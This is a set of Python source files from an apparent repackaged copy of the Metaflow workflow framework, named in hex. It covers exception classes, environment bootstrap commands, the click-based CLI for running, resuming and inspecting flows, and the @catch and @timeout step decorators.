msg = "When evaluating the field *%s* for the Parameter *%s*, "\
"the following exception occurred:\n\n%s" % (field, name, exc)
super(ParameterFieldFailed, self).__init__(msg)
class ParameterFieldTypeMismatch(MetaflowException):
headline = "Parameter field with a mismatching type"
def __init__(self, msg):
super(ParameterFieldTypeMismatch, self).__init__(msg)
class ExternalCommandFailed(MetaflowException):
headline = "External command failed"
def __init__(self, msg):
super(ExternalCommandFailed, self).__init__(msg)
class MetaflowNotFound(MetaflowException):
headline = 'Object not found'
class MetaflowNamespaceMismatch(MetaflowException):
headline = 'Object not in the current namespace'
def __init__(self, namespace):
msg = "Object not in namespace '%s'" % namespace
super(MetaflowNamespaceMismatch, self).__init__(msg)
class MetaflowInternalError(MetaflowException):
headline = 'Internal error'
class MetaflowUnknownUser(MetaflowException):
headline = 'Unknown user'
def __init__(self):
msg = "Metaflow could not determine your user name based on "\
"environment variables ($USERNAME etc.)"
super(MetaflowUnknownUser, self).__init__(msg)
class InvalidDecoratorAttribute(MetaflowException):
headline = "Unknown decorator attribute"
def __init__(self, deconame, attr, defaults):
msg = "Decorator '{deco}' does not support the attribute '{attr}'. "\
"These attributes are supported: {defaults}."\
.format(deco=deconame,
attr=attr,
defaults=', '.join(defaults))
super(InvalidDecoratorAttribute, self).__init__(msg)
class CommandException(MetaflowException):
headline = "Invalid command"
class MetaflowDataMissing(MetaflowException):
headline = "Data missing"
class MergeArtifactsException(MetaflowException):
headline = "Unhandled artifacts in merge"
def __init__(self, msg, unhandled):
super(MergeArtifactsException, self).__init__(msg)
self.artifact_names = unhandled | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/exception.py | exception.py |
import os
import platform
import sys
from .util import get_username, to_unicode
from . import metaflow_version
from metaflow.exception import MetaflowException
version_cache = None
class InvalidEnvironmentException(MetaflowException):
headline = 'Incompatible environment'
class MetaflowEnvironment(object):
TYPE = 'local'
def __init__(self, flow):
pass
def init_environment(self, logger):
"""
Run before any step decorators are initialized.
"""
pass
def validate_environment(self, logger):
"""
Run before any command to validate that we are operating in
a desired environment.
"""
pass
def decospecs(self):
"""
Environment may insert decorators, equivalent to setting --with
options on the command line.
"""
return ()
def bootstrap_commands(self, step_name):
"""
A list of shell commands to bootstrap this environment in a remote runtime.
"""
return []
def add_to_package(self):
"""
A list of tuples (file, arcname) to add to the job package.
`arcname` is an alterative name for the file in the job package.
"""
return []
def pylint_config(self):
"""
Environment may override pylint config.
"""
return []
@classmethod
def get_client_info(cls, flow_name, metadata):
"""
Environment may customize the information returned to the client about the environment
Parameters
----------
flow_name : str
Name of the flow
metadata : dict
Metadata information regarding the task
Returns
-------
str : Information printed and returned to the user
"""
return "Local environment"
def get_package_commands(self, code_package_url):
cmds = ["set -e",
"echo \'Setting up task environment.\'",
"%s -m pip install awscli click requests boto3 \
--user -qqq" % self._python(),
"mkdir metaflow",
"cd metaflow",
"i=0; while [ $i -le 5 ]; do "
"echo \'Downloading code package.\'; "
"%s -m awscli s3 cp %s job.tar >/dev/null && \
echo \'Code package downloaded.\' && break; "
"sleep 10; i=$((i+1));"
"done " % (self._python(), code_package_url),
"tar xf job.tar"
]
return cmds
def get_environment_info(self):
global version_cache
if version_cache is None:
version_cache = metaflow_version.get_version()
# note that this dict goes into the code package
# so variables here should be relatively stable (no
# timestamps) so the hash won't change all the time
env = {'platform': platform.system(),
'username': get_username(),
'production_token': os.environ.get('METAFLOW_PRODUCTION_TOKEN'),
'runtime': os.environ.get('METAFLOW_RUNTIME_NAME', 'dev'),
'app': os.environ.get('APP'),
'environment_type': self.TYPE,
'python_version': sys.version,
'python_version_code': '%d.%d.%d' % sys.version_info[:3],
'metaflow_version': version_cache,
'script': os.path.basename(os.path.abspath(sys.argv[0]))}
return env
def executable(self, step_name):
return self._python()
def _python(self):
return "python" | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/environment.py | environment.py |
import os
import sys
import inspect
import traceback
from functools import partial, wraps
from datetime import datetime
import click
from . import lint
from . import plugins
from . import parameters
from . import decorators
from . import metaflow_version
from . import namespace
from .util import resolve_identity, decompress_list, write_latest_run_id, get_latest_run_id
from .task import MetaflowTask
from .exception import CommandException, MetaflowException
from .graph import FlowGraph
from .datastore import DATASTORES
from .runtime import NativeRuntime
from .package import MetaflowPackage
from .plugins import LOGGING_SIDECAR, MONITOR_SIDECAR
from .metadata import METADATAPROVIDERS
from .metaflow_config import DEFAULT_DATASTORE, DEFAULT_METADATA
from .plugins import ENVIRONMENTS
from .environment import MetaflowEnvironment
from .pylint_wrapper import PyLint
from .event_logger import EventLogger
from .monitor import Monitor
ERASE_TO_EOL = '\033[K'
HIGHLIGHT = 'red'
INDENT = ' ' * 4
LOGGER_TIMESTAMP = 'magenta'
LOGGER_COLOR = 'green'
LOGGER_BAD_COLOR = 'red'
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
def echo_dev_null(*args, **kwargs):
pass
def echo_always(line, **kwargs):
kwargs['err'] = kwargs.get('err', True)
if kwargs.pop('indent', None):
line = '\n'.join(INDENT + x for x in line.splitlines())
if 'nl' not in kwargs or kwargs['nl']:
line += ERASE_TO_EOL
top = kwargs.pop('padding_top', None)
bottom = kwargs.pop('padding_bottom', None)
highlight = kwargs.pop('highlight', HIGHLIGHT)
if top:
click.secho(ERASE_TO_EOL, **kwargs)
hl_bold = kwargs.pop('highlight_bold', True)
nl = kwargs.pop('nl', True)
fg = kwargs.pop('fg', None)
bold = kwargs.pop('bold', False)
kwargs['nl'] = False
hl = True
nobold = kwargs.pop('no_bold', False)
if nobold:
click.secho(line, **kwargs)
else:
for span in line.split('*'):
if hl:
hl = False
kwargs['fg'] = fg
kwargs['bold'] = bold
click.secho(span, **kwargs)
else:
hl = True
kwargs['fg'] = highlight
kwargs['bold'] = hl_bold
click.secho(span, **kwargs)
if nl:
kwargs['nl'] = True
click.secho('', **kwargs)
if bottom:
click.secho(ERASE_TO_EOL, **kwargs)
def logger(body='', system_msg=False, head='', bad=False, timestamp=True):
if timestamp:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
click.secho(tstamp + ' ', fg=LOGGER_TIMESTAMP, nl=False)
if head:
click.secho(head, fg=LOGGER_COLOR, nl=False)
click.secho(body,
bold=system_msg,
fg=LOGGER_BAD_COLOR if bad else None)
@click.group()
def cli(ctx):
pass
@cli.command(help='Check that the flow is valid (default).')
@click.option('--warnings/--no-warnings',
default=False,
show_default=True,
help='Show all Pylint warnings, not just errors.')
@click.pass_obj
def check(obj, warnings=False):
_check(obj.graph, obj.flow, obj.environment, pylint=obj.pylint, warnings=warnings)
fname = inspect.getfile(obj.flow.__class__)
echo("\n*'{cmd} show'* shows a description of this flow.\n"
"*'{cmd} run'* runs the flow locally.\n"
"*'{cmd} help'* shows all available commands and options.\n"
.format(cmd=fname), highlight='magenta', highlight_bold=False)
@cli.command(help='Show structure of the flow.')
@click.pass_obj
def show(obj):
echo_always('\n%s' % obj.graph.doc)
for _, node in sorted((n.func_lineno, n) for n in obj.graph):
echo_always('\nStep *%s*' % node.name, err=False)
echo_always(node.doc if node.doc else '?', indent=True, err=False)
if node.type != 'end':
echo_always('*=>* %s' % ', '.join('*%s*' % n for n in node.out_funcs),
indent=True,
highlight='magenta',
highlight_bold=False,
err=False)
echo_always('')
@cli.command(help='Show all available commands.')
@click.pass_context
def help(ctx):
print(ctx.parent.get_help())
@cli.command(help='Output internal state of the flow graph.')
@click.pass_obj
def output_raw(obj):
echo('Internal representation of the flow:',
fg='magenta',
bold=False)
echo_always(str(obj.graph), err=False)
@cli.command(help='Visualize the flow with Graphviz.')
@click.pass_obj
def output_dot(obj):
echo('Visualizing the flow as a GraphViz graph',
fg='magenta',
bold=False)
echo("Try piping the output to 'dot -Tpng -o graph.png' to produce "
"an actual image.", indent=True)
echo_always(obj.graph.output_dot(), err=False)
@cli.command(help='Get data artifacts of a task or all tasks in a step. '
'The format for input-path is either <run_id>/<step_name> or '
'<run_id>/<step_name>/<task_id>.')
@click.argument('input-path')
@click.option('--private/--no-private',
default=False,
show_default=True,
help='Show also private attributes.')
@click.option('--max-value-size',
default=1000,
show_default=True,
type=int,
help='Show only values that are smaller than this number. '
'Set to 0 to see only keys.')
@click.option('--include',
type=str,
default='',
help='Include only artifacts in the given comma-separated list.')
@click.option('--file',
type=str,
default=None,
help='Serialize artifacts in the given file.')
@click.pass_obj
def dump(obj,
input_path,
private=None,
max_value_size=None,
include=None,
file=None):
output = {}
kwargs = {'show_private': private,
'max_value_size': max_value_size,
'include': {t for t in include.split(',') if t}}
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(
obj.echo, create_on_absent=False)
if obj.datastore.datastore_root is None:
raise CommandException(
"Could not find the location of the datastore -- did you correctly set the "
"METAFLOW_DATASTORE_SYSROOT_%s environment variable" % (obj.datastore.TYPE).upper())
# Pathspec can either be run_id/step_name or run_id/step_name/task_id.
parts = input_path.split('/')
if len(parts) == 2:
run_id, step_name = parts
task_id = None
elif len(parts) == 3:
run_id, step_name, task_id = parts
else:
raise CommandException("input_path should either be run_id/step_name"
"or run_id/step_name/task_id")
from metaflow.datastore.datastore_set import MetaflowDatastoreSet
datastore_set = MetaflowDatastoreSet(
obj.datastore,
obj.flow.name,
run_id,
steps=[step_name],
metadata=obj.metadata,
monitor=obj.monitor,
event_logger=obj.event_logger,
prefetch_data_artifacts=kwargs.get('include'))
if task_id:
ds_list = [datastore_set.get_with_pathspec(input_path)]
else:
ds_list = list(datastore_set) # get all tasks
for ds in ds_list:
echo('Dumping output of run_id=*{run_id}* '
'step=*{step}* task_id=*{task_id}*'.format(run_id=ds.run_id,
step=ds.step_name,
task_id=ds.task_id),
fg='magenta')
if file is None:
echo_always(ds.format(**kwargs),
highlight='green',
highlight_bold=False,
err=False)
else:
output[ds.pathspec] = ds.to_dict(**kwargs)
if file is not None:
with open(file, 'wb') as f:
pickle.dump(output, f, protocol=pickle.HIGHEST_PROTOCOL)
echo('Artifacts written to *%s*' % file)
@cli.command(help='Show stdout/stderr produced by a task or all tasks in a step. '
'The format for input-path is either <run_id>/<step_name> or '
'<run_id>/<step_name>/<task_id>.')
@click.argument('input-path')
@click.option('--stdout/--no-stdout',
default=False,
show_default=True,
help='Show stdout of the task.')
@click.option('--stderr/--no-stderr',
default=False,
show_default=True,
help='Show stderr of the task.')
@click.option('--both/--no-both',
default=True,
show_default=True,
help='Show both stdout and stderr of the task.')
@click.pass_obj
def logs(obj, input_path, stdout=None, stderr=None, both=None):
types = set()
if stdout:
types.add('stdout')
both = False
if stderr:
types.add('stderr')
both = False
if both:
types.update(('stdout', 'stderr'))
# Pathspec can either be run_id/step_name or run_id/step_name/task_id.
parts = input_path.split('/')
if len(parts) == 2:
run_id, step_name = parts
task_id = None
elif len(parts) == 3:
run_id, step_name, task_id = parts
else:
raise CommandException("input_path should either be run_id/step_name"
"or run_id/step_name/task_id")
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(
obj.echo, create_on_absent=False)
if obj.datastore.datastore_root is None:
raise CommandException(
"Could not find the location of the datastore -- did you correctly set the "
"METAFLOW_DATASTORE_SYSROOT_%s environment variable" % (obj.datastore.TYPE).upper())
from metaflow.datastore.datastore_set import MetaflowDatastoreSet
datastore_set = MetaflowDatastoreSet(
obj.datastore,
obj.flow.name,
run_id,
steps=[step_name],
metadata=obj.metadata,
monitor=obj.monitor,
event_logger=obj.event_logger)
if task_id:
ds_list = [datastore_set.get_with_pathspec(input_path)]
else:
ds_list = list(datastore_set) # get all tasks
for ds in ds_list:
echo('Dumping logs of run_id=*{run_id}* '
'step=*{step}* task_id=*{task_id}*'.format(run_id=ds.run_id,
step=ds.step_name,
task_id=ds.task_id),
fg='magenta')
for typ in ('stdout', 'stderr'):
if typ in types:
echo(typ, bold=True)
click.secho(ds.load_log(typ).decode('UTF-8', errors='replace'),
nl=False)
# TODO - move step and init under a separate 'internal' subcommand
@cli.command(help="Internal command to execute a single task.")
@click.argument('step-name')
@click.option('--run-id',
default=None,
required=True,
help='ID for one execution of all steps in the flow.')
@click.option('--task-id',
default=None,
required=True,
show_default=True,
help='ID for this instance of the step.')
@click.option('--input-paths',
help='A comma-separated list of pathspecs '
'specifying inputs for this step.')
@click.option('--split-index',
type=int,
default=None,
show_default=True,
help='Index of this foreach split.')
@click.option('--tag',
'tags',
multiple=True,
default=None,
help="Annotate this run with the given tag. You can specify "
"this option multiple times to attach multiple tags in "
"the task.")
@click.option('--namespace',
'user_namespace',
default=None,
help="Change namespace from the default (your username) to "
"the specified tag.")
@click.option('--retry-count',
default=0,
help="How many times we have attempted to run this task.")
@click.option('--max-user-code-retries',
default=0,
help="How many times we should attempt running the user code.")
@click.option('--clone-only',
default=None,
help="Pathspec of the origin task for this task to clone. Do "
"not execute anything.")
@click.option('--clone-run-id',
default=None,
help="Run id of the origin flow, if this task is part of a flow "
"being resumed.")
@click.pass_obj
def step(obj,
step_name,
tags=None,
run_id=None,
task_id=None,
input_paths=None,
split_index=None,
user_namespace=None,
retry_count=None,
max_user_code_retries=None,
clone_only=None,
clone_run_id=None):
if user_namespace is not None:
namespace(user_namespace or None)
func = None
try:
func = getattr(obj.flow, step_name)
except:
raise CommandException("Step *%s* doesn't exist." % step_name)
if not func.is_step:
raise CommandException("Function *%s* is not a step." % step_name)
echo('Executing a step, *%s*' % step_name,
fg='magenta',
bold=False)
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
obj.metadata.add_sticky_tags(tags=tags)
paths = decompress_list(input_paths) if input_paths else []
task = MetaflowTask(obj.flow,
obj.datastore,
obj.metadata,
obj.environment,
obj.logger,
obj.event_logger,
obj.monitor)
if clone_only:
task.clone_only(step_name,
run_id,
task_id,
clone_only)
else:
task.run_step(step_name,
run_id,
task_id,
clone_run_id,
paths,
split_index,
retry_count,
max_user_code_retries)
echo('Success', fg='green', bold=True, indent=True)
@parameters.add_custom_parameters
@cli.command(help="Internal command to initialize a run.")
@click.option('--run-id',
default=None,
required=True,
help='ID for one execution of all steps in the flow.')
@click.option('--task-id',
default=None,
required=True,
help='ID for this instance of the step.')
@click.pass_obj
def init(obj, run_id=None, task_id=None, **kwargs):
# init is a separate command instead of an option in 'step'
# since we need to capture user-specified parameters with
# @add_custom_parameters. Adding custom parameters to 'step'
# is not desirable due to the possibility of name clashes between
# user-specified parameters and our internal options. Note that
# user-specified parameters are often defined as environment
# variables.
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
run_id=run_id)
parameters.set_parameters(obj.flow, kwargs)
runtime.persist_parameters(task_id=task_id)
def common_run_options(func):
@click.option('--tag',
'tags',
multiple=True,
default=None,
help="Annotate this run with the given tag. You can specify "
"this option multiple times to attach multiple tags in "
"the run.")
@click.option('--max-workers',
default=16,
show_default=True,
help='Maximum number of parallel processes.')
@click.option('--max-num-splits',
default=100,
show_default=True,
help='Maximum number of splits allowed in a foreach. This '
'is a safety check preventing bugs from triggering '
'thousands of steps inadvertently.')
@click.option('--max-log-size',
default=10,
show_default=True,
help='Maximum size of stdout and stderr captured in '
'megabytes. If a step outputs more than this to '
'stdout/stderr, its output will be truncated.')
@click.option('--with',
'decospecs',
multiple=True,
help="Add a decorator to all steps. You can specify this "
"option multiple times to attach multiple decorators "
"in steps.")
@click.option('--run-id-file',
default=None,
show_default=True,
type=str,
help="Write the ID of this run to the file specified.")
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
@click.option('--origin-run-id',
default=None,
help="ID of the run that should be resumed. By default, the "
"last run executed locally.")
@click.argument('step-to-rerun',
required=False)
@cli.command(help='Resume execution of a previous run of this flow.')
@common_run_options
@click.pass_obj
def resume(obj,
tags=None,
step_to_rerun=None,
origin_run_id=None,
max_workers=None,
max_num_splits=None,
max_log_size=None,
decospecs=None,
run_id_file=None):
before_run(obj, tags, decospecs + obj.environment.decospecs())
if origin_run_id is None:
origin_run_id = get_latest_run_id(obj.echo, obj.flow.name)
if origin_run_id is None:
raise CommandException("A previous run id was not found. Specify --origin-run-id.")
if step_to_rerun is None:
clone_steps = set()
else:
clone_steps = {step_to_rerun}
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
clone_run_id=origin_run_id,
clone_steps=clone_steps,
max_workers=max_workers,
max_num_splits=max_num_splits,
max_log_size=max_log_size * 1024 * 1024)
runtime.persist_parameters()
runtime.execute()
write_run_id(run_id_file, runtime.run_id)
@parameters.add_custom_parameters
@cli.command(help='Run the workflow locally.')
@common_run_options
@click.option('--namespace',
'user_namespace',
default=None,
help="Change namespace from the default (your username) to "
"the specified tag. Note that this option does not alter "
"tags assigned to the objects produced by this run, just "
"what existing objects are visible in the client API. You "
"can enable the global namespace with an empty string."
"--namespace=")
@click.pass_obj
def run(obj,
tags=None,
max_workers=None,
max_num_splits=None,
max_log_size=None,
decospecs=None,
run_id_file=None,
user_namespace=None,
**kwargs):
if namespace is not None:
namespace(user_namespace or None)
before_run(obj, tags, decospecs + obj.environment.decospecs())
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
max_workers=max_workers,
max_num_splits=max_num_splits,
max_log_size=max_log_size * 1024 * 1024)
write_latest_run_id(obj, runtime.run_id)
write_run_id(run_id_file, runtime.run_id)
parameters.set_parameters(obj.flow, kwargs)
runtime.persist_parameters()
runtime.execute()
def write_run_id(run_id_file, run_id):
if run_id_file is not None:
with open(run_id_file, 'w') as f:
f.write(str(run_id))
def before_run(obj, tags, decospecs):
# There's a --with option both at the top-level and for the run
# subcommand. Why?
#
# "run --with shoes" looks so much better than "--with shoes run".
# This is a very common use case of --with.
#
# A downside is that we need to have the following decorators handling
# in two places in this module and we need to make sure that
# _init_decorators doesn't get called twice.
if decospecs:
decorators._attach_decorators(obj.flow, decospecs)
obj.graph = FlowGraph(obj.flow.__class__)
obj.check(obj.graph, obj.flow, obj.environment, pylint=obj.pylint)
#obj.environment.init_environment(obj.logger)
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
decorators._init_decorators(
obj.flow, obj.graph, obj.environment, obj.datastore, obj.logger)
obj.metadata.add_sticky_tags(tags=tags)
# Package working directory only once per run.
# We explicitly avoid doing this in `start` since it is invoked for every
# step in the run.
# TODO(crk): Capture time taken to package and log to keystone.
obj.package = MetaflowPackage(obj.flow, obj.environment, obj.logger, obj.package_suffixes)
@cli.command(help='Print the Metaflow version')
@click.pass_obj
def version(obj):
echo_always(obj.version)
@click.command(cls=click.CommandCollection,
sources=[cli] + plugins.get_plugin_cli(),
invoke_without_command=True)
@click.option('--quiet/--not-quiet',
show_default=True,
default=False,
help='Suppress unnecessary messages')
@click.option('--metadata',
default=DEFAULT_METADATA,
show_default=True,
type=click.Choice([m.TYPE for m in METADATAPROVIDERS]),
help='Metadata service type')
@click.option('--environment',
default='local',
show_default=True,
type=click.Choice(['local'] + [m.TYPE for m in ENVIRONMENTS]),
help='Execution environment type')
@click.option('--datastore',
default=DEFAULT_DATASTORE,
show_default=True,
type=click.Choice(DATASTORES),
help='Data backend type')
@click.option('--datastore-root',
help='Root path for datastore')
@click.option('--package-suffixes',
help='A comma-separated list of file suffixes to include '
'in the code package.',
default='.py',
show_default=True)
@click.option('--with',
'decospecs',
multiple=True,
help="Add a decorator to all steps. You can specify this option "
"multiple times to attach multiple decorators in steps.")
@click.option('--pylint/--no-pylint',
default=True,
show_default=True,
help='Run Pylint on the flow if pylint is installed.')
@click.option('--coverage',
is_flag=True,
default=False,
show_default=True,
help='Measure code coverage using coverage.py.')
@click.option('--event-logger',
default='nullSidecarLogger',
show_default=True,
type=click.Choice(LOGGING_SIDECAR),
help='type of event logger used')
@click.option('--monitor',
default='nullSidecarMonitor',
show_default=True,
type=click.Choice(MONITOR_SIDECAR),
help='Monitoring backend type')
@click.pass_context
def start(ctx,
quiet=False,
metadata=None,
environment=None,
datastore=None,
datastore_root=None,
decospecs=None,
package_suffixes=None,
pylint=None,
coverage=None,
event_logger=None,
monitor=None):
global echo
if quiet:
echo = echo_dev_null
else:
echo = echo_always
ctx.obj.version = metaflow_version.get_version()
echo('Metaflow %s' % ctx.obj.version, fg='magenta', bold=True, nl=False)
echo(" executing *%s*" % ctx.obj.flow.name, fg='magenta', nl=False)
echo(" for *%s*" % resolve_identity(), fg='magenta')
if decospecs:
decorators._attach_decorators(ctx.obj.flow, decospecs)
if coverage:
from coverage import Coverage
cov = Coverage(data_suffix=True,
auto_data=True,
source=['metaflow'],
branch=True)
cov.start()
ctx.obj.echo = echo
ctx.obj.echo_always = echo_always
ctx.obj.graph = FlowGraph(ctx.obj.flow.__class__)
ctx.obj.logger = logger
ctx.obj.check = _check
ctx.obj.pylint = pylint
ctx.obj.top_cli = cli
ctx.obj.package_suffixes = package_suffixes.split(',')
ctx.obj.reconstruct_cli = _reconstruct_cli
ctx.obj.event_logger = EventLogger(event_logger)
ctx.obj.environment = [e for e in ENVIRONMENTS + [MetaflowEnvironment]
if e.TYPE == environment][0](ctx.obj.flow)
ctx.obj.environment.validate_environment(echo)
ctx.obj.monitor = Monitor(monitor, ctx.obj.environment, ctx.obj.flow.name)
ctx.obj.monitor.start()
ctx.obj.metadata = [m for m in METADATAPROVIDERS
if m.TYPE == metadata][0](ctx.obj.environment,
ctx.obj.flow,
ctx.obj.event_logger,
ctx.obj.monitor)
ctx.obj.datastore = DATASTORES[datastore]
ctx.obj.datastore_root = datastore_root
if ctx.invoked_subcommand not in ('run', 'resume'):
# run/resume are special cases because they can add more decorators with --with,
# so they have to take care of themselves.
decorators._attach_decorators(
ctx.obj.flow, ctx.obj.environment.decospecs())
decorators._init_decorators(
ctx.obj.flow, ctx.obj.graph, ctx.obj.environment, ctx.obj.datastore, ctx.obj.logger)
#TODO (savin): Enable lazy instantiation of package
ctx.obj.package = None
if ctx.invoked_subcommand is None:
ctx.invoke(check)
def _reconstruct_cli(params):
for k, v in params.items():
if v:
if k == 'decospecs':
k = 'with'
k = k.replace('_', '-')
if not isinstance(v, tuple):
v = [v]
for value in v:
yield '--%s' % k
if not isinstance(value, bool):
yield str(value)
def _check(graph, flow, environment, pylint=True, warnings=False, **kwargs):
echo("Validating your flow...", fg='magenta', bold=False)
linter = lint.linter
# TODO set linter settings
linter.run_checks(graph, **kwargs)
echo('The graph looks good!', fg='green', bold=True, indent=True)
if pylint:
echo("Running pylint...", fg='magenta', bold=False)
fname = inspect.getfile(flow.__class__)
pylint = PyLint(fname)
if pylint.has_pylint():
pylint.run(warnings=warnings, pylint_config=environment.pylint_config(), logger=echo_always)
echo('Pylint is happy!',
fg='green',
bold=True,
indent=True)
else:
echo("Pylint not found, so extra checks are disabled.",
fg='green',
indent=True,
bold=False)
def print_metaflow_exception(ex):
echo_always(ex.headline, indent=True, nl=False, bold=True)
if ex.line_no is None:
echo_always(':')
else:
echo_always(' on line %d:' % ex.line_no, bold=True)
echo_always(ex.message, indent=True, bold=False, padding_bottom=True)
def print_unknown_exception(ex):
echo_always('Internal error', indent=True, bold=True)
echo_always(traceback.format_exc(), highlight=None, highlight_bold=False)
class CliState(object):
def __init__(self, flow):
self.flow = flow
def main(flow, args=None, handle_exceptions=True, entrypoint=None):
# Ignore warning(s) and prevent spamming the end-user.
# TODO: This serves as a short term workaround for RuntimeWarning(s) thrown
# in py3.8 related to log buffering (bufsize=1).
import warnings
warnings.filterwarnings('ignore')
if entrypoint is None:
entrypoint = [sys.executable, sys.argv[0]]
state = CliState(flow)
state.entrypoint = entrypoint
parameters.set_parameter_context(flow.name)
try:
if args is None:
start(auto_envvar_prefix='METAFLOW', obj=state)
else:
try:
start.main(args=args,
obj=state,
auto_envvar_prefix='METAFLOW')
except SystemExit as e:
return e.code
except MetaflowException as x:
if handle_exceptions:
print_metaflow_exception(x)
sys.exit(1)
else:
raise
except Exception as x:
if handle_exceptions:
print_unknown_exception(x)
sys.exit(1)
else:
raise | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/cli.py | cli.py |
import traceback
from metaflow.exception import MetaflowException,\
MetaflowExceptionWrapper
from metaflow.decorators import StepDecorator
NUM_FALLBACK_RETRIES = 3
class FailureHandledByCatch(MetaflowException):
headline = 'Task execution failed but @catch handled it'
def __init__(self, retry_count):
msg = 'Task execution kept failing over %d attempts. '\
'Your code did not raise an exception. Something '\
'in the execution environment caused the failure.' % retry_count
super(FailureHandledByCatch, self).__init__(msg)
class CatchDecorator(StepDecorator):
"""
Step decorator to specify error handling for your step.
This decorator indicates that exceptions in the step should be caught and not fail the entire
flow.
This can be used in conjunction with the @retry decorator. In that case, catch will only
activate if all retries fail and will catch the last exception thrown by the last retry.
To use, annotate your step as follows:
```
@catch(var='foo')
@step
def myStep(self):
...
```
Parameters
----------
var : string
Name of the artifact in which to store the caught exception. If not specified,
the exception is not stored
print_exception : bool
Determines whether or not the exception is printed to stdout when caught. Defaults
to True
"""
name = 'catch'
defaults = {'var': None,
'print_exception': True}
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
# handling _foreach_var and _foreach_num_splits requires some
# deeper thinking, so let's not support that use case for now
self.logger = logger
if graph[step].type == 'foreach':
raise MetaflowException('@catch is defined for the step *%s* '
'but @catch is not supported in foreach '
'split steps.' % step)
def _print_exception(self, step, flow):
self.logger(head='@catch caught an exception from %s' % flow,
timestamp=False)
for line in traceback.format_exc().splitlines():
self.logger('> %s' % line, timestamp=False)
def _set_var(self, flow, val):
var = self.attributes.get('var')
if var:
setattr(flow, var, val)
def task_exception(self,
exception,
step,
flow,
graph,
retry_count,
max_user_code_retries):
if self.attributes['print_exception']:
self._print_exception(step, flow)
# pretend that self.next() was called as usual
flow._transition = (graph[step].out_funcs, None, None)
# store the exception
picklable = MetaflowExceptionWrapper(exception)
flow._catch_exception = picklable
self._set_var(flow, picklable)
return True
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
# there was no exception, set the exception var (if any) to None
self._set_var(flow, None)
def step_task_retry_count(self):
return 0, NUM_FALLBACK_RETRIES
def task_decorate(self,
step_func,
func,
graph,
retry_count,
max_user_code_retries):
# if the user code has failed max_user_code_retries times, @catch
# runs a piece of fallback code instead. This way we can continue
# running the flow downsteam, as we have a proper entry for this task.
def fallback_step(inputs=None):
raise FailureHandledByCatch(retry_count)
if retry_count > max_user_code_retries:
return fallback_step
else:
return step_func | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/catch_decorator.py | catch_decorator.py |
import signal
import traceback
from metaflow.exception import MetaflowException
from metaflow.decorators import StepDecorator
class TimeoutException(MetaflowException):
headline = '@timeout'
class TimeoutDecorator(StepDecorator):
"""
Step decorator to specify a timeout for your step.
This decorator is useful if this step may hang indefinitely.
This can be used in conjunction with the @retry decorator as well as the @catch decorator.
A timeout is considered to be an exception thrown by the step and will cause the step to be
retried if needed and the exception will be caught by the 'catch' decorator if present.
To use, annotate your step as follows:
```
@timeout(minutes=1)
@step
def myStep(self):
...
```
Note that all the values specified in parameters are added together so if you specify
60 seconds and 1 hour, the decorator will have an effective timeout of 1 hour and 1 minute.
Parameters
----------
seconds : int
Number of seconds to wait prior to timing out.
minutes : int
Number of minutes to wait prior to timing out
hours : int
Number of hours to wait prior to timing out
minutes_between_retries : int
Number of minutes between retries
"""
name = 'timeout'
defaults = {'seconds': 0,
'minutes': 0,
'hours': 0}
def __init__(self, *args, **kwargs):
super(TimeoutDecorator, self).__init__(*args, **kwargs)
# Initialize secs in __init__ so other decorators could safely use this
# value without worrying about decorator order.
# Convert values in attributes to type:int since they can be type:str
# when passed using the CLI option --with.
self.secs = int(self.attributes['hours']) * 3600 +\
int(self.attributes['minutes']) * 60 +\
int(self.attributes['seconds'])
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
self.logger = logger
if not self.secs:
raise MetaflowException('Specify a duration for @timeout.')
def task_pre_step(self,
step_name,
datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_user_code_retries):
if retry_count <= max_user_code_retries:
# enable timeout only when executing user code
self.step_name = step_name
signal.signal(signal.SIGALRM, self._sigalrm_handler)
signal.alarm(self.secs)
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
signal.alarm(0)
def _sigalrm_handler(self, signum, frame):
def pretty_print_stack():
for line in traceback.format_stack():
if 'timeout_decorators.py' not in line:
for part in line.splitlines():
yield '> %s' % part
msg = 'Step {step_name} timed out after {hours} hours, '\
'{minutes} minutes, {seconds} seconds'\
.format(step_name=self.step_name, **self.attributes)
self.logger(msg)
raise TimeoutException('%s\nStack when the timeout was raised:\n%s'
% (msg, '\n'.join(pretty_print_stack())))
def get_run_time_limit_for_task(step_decos):
run_time_limit = 5 * 24 * 60 * 60 # 5 days.
for deco in step_decos:
if isinstance(deco, TimeoutDecorator):
run_time_limit = deco.secs
return run_time_limit | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/timeout_decorator.py | timeout_decorator.py |
import json
import os
import sys
import tarfile
